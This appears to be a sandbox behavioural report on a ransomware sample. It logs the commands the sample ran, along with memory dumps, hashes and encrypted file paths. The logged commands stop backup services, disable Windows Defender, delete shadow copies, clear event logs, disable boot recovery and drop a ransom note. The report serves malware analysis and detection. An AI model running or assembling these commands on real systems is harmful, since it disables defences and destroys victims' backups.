| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\ransomware.exe
"C:\Users\Admin\AppData\Local\Temp\ransomware.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\notepad.exe
notepad.exe C:\ihr6_HOW_TO_DECRYPT.txt
C:\Windows\system32\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\ransomware.exe"
C:\Windows\system32\PING.EXE
ping.exe -n 5 127.0.0.1
Network
Files
memory/644-54-0x0000000000000000-mapping.dmp
memory/1624-55-0x0000000000000000-mapping.dmp
memory/1500-56-0x0000000000000000-mapping.dmp
memory/532-57-0x0000000000000000-mapping.dmp
memory/1976-58-0x0000000000000000-mapping.dmp
memory/1752-59-0x0000000000000000-mapping.dmp
memory/620-60-0x0000000000000000-mapping.dmp
memory/1984-61-0x0000000000000000-mapping.dmp
memory/2036-62-0x0000000000000000-mapping.dmp
memory/1056-63-0x0000000000000000-mapping.dmp
memory/1088-64-0x0000000000000000-mapping.dmp
memory/852-65-0x0000000000000000-mapping.dmp
memory/820-66-0x0000000000000000-mapping.dmp
memory/1236-67-0x0000000000000000-mapping.dmp
memory/1464-68-0x0000000000000000-mapping.dmp
memory/792-69-0x0000000000000000-mapping.dmp
memory/1648-70-0x0000000000000000-mapping.dmp
memory/652-71-0x0000000000000000-mapping.dmp
memory/844-72-0x0000000000000000-mapping.dmp
memory/1272-73-0x0000000000000000-mapping.dmp
memory/1204-74-0x0000000000000000-mapping.dmp
memory/684-75-0x0000000000000000-mapping.dmp
memory/1628-76-0x0000000000000000-mapping.dmp
memory/1508-77-0x0000000000000000-mapping.dmp
memory/1680-78-0x0000000000000000-mapping.dmp
memory/616-79-0x0000000000000000-mapping.dmp
memory/1112-80-0x0000000000000000-mapping.dmp
memory/1716-81-0x0000000000000000-mapping.dmp
memory/384-82-0x0000000000000000-mapping.dmp
memory/1984-83-0x0000000000000000-mapping.dmp
memory/1052-84-0x0000000000000000-mapping.dmp
memory/1924-85-0x0000000000000000-mapping.dmp
memory/2000-86-0x0000000000000000-mapping.dmp
memory/744-87-0x0000000000000000-mapping.dmp
memory/1872-88-0x0000000000000000-mapping.dmp
memory/320-89-0x0000000000000000-mapping.dmp
memory/856-90-0x0000000000000000-mapping.dmp
memory/1712-91-0x0000000000000000-mapping.dmp
memory/1096-92-0x0000000000000000-mapping.dmp
memory/1548-93-0x0000000000000000-mapping.dmp
memory/1316-94-0x0000000000000000-mapping.dmp
memory/328-95-0x0000000000000000-mapping.dmp
memory/1832-96-0x0000000000000000-mapping.dmp
memory/1824-97-0x0000000000000000-mapping.dmp
memory/1160-98-0x0000000000000000-mapping.dmp
memory/1748-99-0x0000000000000000-mapping.dmp
memory/1236-100-0x0000000000000000-mapping.dmp
memory/1596-101-0x0000000000000000-mapping.dmp
memory/1652-102-0x0000000000000000-mapping.dmp
memory/1940-103-0x0000000000000000-mapping.dmp
memory/1740-104-0x0000000000000000-mapping.dmp
memory/1588-105-0x0000000000000000-mapping.dmp
memory/1624-106-0x0000000000000000-mapping.dmp
memory/1820-107-0x0000000000000000-mapping.dmp
memory/1492-108-0x0000000000000000-mapping.dmp
memory/896-109-0x0000000000000000-mapping.dmp
memory/1328-110-0x0000000000000000-mapping.dmp
memory/736-111-0x0000000000000000-mapping.dmp
memory/1600-112-0x0000000000000000-mapping.dmp
memory/1600-113-0x000007FEFB551000-0x000007FEFB553000-memory.dmp
memory/1732-114-0x0000000000000000-mapping.dmp
memory/2028-116-0x0000000000000000-mapping.dmp
memory/1604-118-0x0000000000000000-mapping.dmp
memory/1720-119-0x0000000000000000-mapping.dmp
memory/1384-120-0x0000000000000000-mapping.dmp
memory/852-122-0x000007FEF2040000-0x000007FEF2B9D000-memory.dmp
memory/852-124-0x0000000002300000-0x0000000002302000-memory.dmp
memory/852-125-0x0000000002302000-0x0000000002304000-memory.dmp
memory/852-126-0x0000000002304000-0x0000000002307000-memory.dmp
memory/852-123-0x000000001B6E0000-0x000000001B9DF000-memory.dmp
memory/852-127-0x000000000230B000-0x000000000232A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 2aa9f499df2f8b28486532cd948eb75b |
| SHA1 | 64579980334326fa5e99cb49e22a46ac86a8fa6b |
| SHA256 | 7ff364a4895a250e935f2eba287e205406915ec6e5d944d1eb30edfc8118f00c |
| SHA512 | 4f5b6e1bf43d84c82c39df37c320b10a79d147fc8ce6ab1e237b4f363f49053a2d64943dd6f77946233bbb9ef474d77952d2f81279a9c58212539722cce2191b |
memory/2140-130-0x000007FEF2580000-0x000007FEF30DD000-memory.dmp
memory/2140-131-0x00000000023B0000-0x00000000023B2000-memory.dmp
memory/2140-132-0x00000000023B2000-0x00000000023B4000-memory.dmp
memory/2140-133-0x00000000023B4000-0x00000000023B7000-memory.dmp
memory/2140-134-0x00000000023BB000-0x00000000023DA000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-03-23 08:33
Reported
2022-03-23 08:40
Platform
win10v2004-en-20220113
Max time kernel
131s
Max time network
157s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVClient.man.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_NgAAADYAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_SubTest-pl.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Delete.White.png.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_IgAAACIAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_zh_4.4.0.v20140623020002.jar.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_SubTest-ul-oob.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageStoreLogo.scale-125_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\MSInfo\de-DE\msinfo32.exe.mui.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_JgAAACYAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CANYON\CANYON.INF.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_Subscription-ppd.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\Office.en-us\PSS10O.CHM.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\ja-JP\sqloledb.rll.mui | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\MSInfo\es-ES\msinfo32.exe.mui | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_pt_BR.jar.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_OAAAADgAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-windows.xml.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ARCTIC\THMBNAIL.PNG.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_CgAAAAoAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\doh-rollout@mozilla.org.xpi.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\StoreLogo.scale-150.png | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Kiss.png | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\mscss7cm_en.dub.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\Sybase.xsl.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_EAAAABAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\vlc.mo.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Weather_LogoSmall.targetsize-256_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageBadgeLogo.scale-125_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\BadgeLogo.scale-125_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\javafx.properties.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_FgAAABYAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_JgAAACYAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\eclipse.inf.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_KgAAACoAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_zh_CN.jar.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_LgAAAC4AAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.People_10.1902.633.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxSignature.p7x | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-white_scale-100.png.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_FgAAABYAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SUMIPNTG\PREVIEW.GIF.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_LgAAAC4AAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\dialogs\equalizer_window.html.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_IAAAACAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVClientIsv.man.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_IgAAACIAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.registry_3.5.400.v20140428-1507.jar.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_BAAAAAQAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Retail-pl.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_PgAAAD4AAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_OEM_Perp-ul-oob.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_GAAAABgAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_MAKC2R-ul-phn.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_LgAAAC4AAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-72_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdXC2RVL_KMS_ClientC2R-ppd.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Retail-ul-phn.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessR_Grace-ul-oob.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\rsod\dcfmui.msi.16.en-us.tree.dat.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_IgAAACIAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\contrast-black\SmallTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Getstarted_8.2.22942.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GetStartedMedTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-125_kzf8qxf38zg5c\Assets\Images\SkypeWideTile.scale-125_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\nl-NL\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ul-phn.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Word2019VL_MAK_AE-ppd.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft | C:\Users\Admin\AppData\Local\Temp\ransomware.exe | N/A |
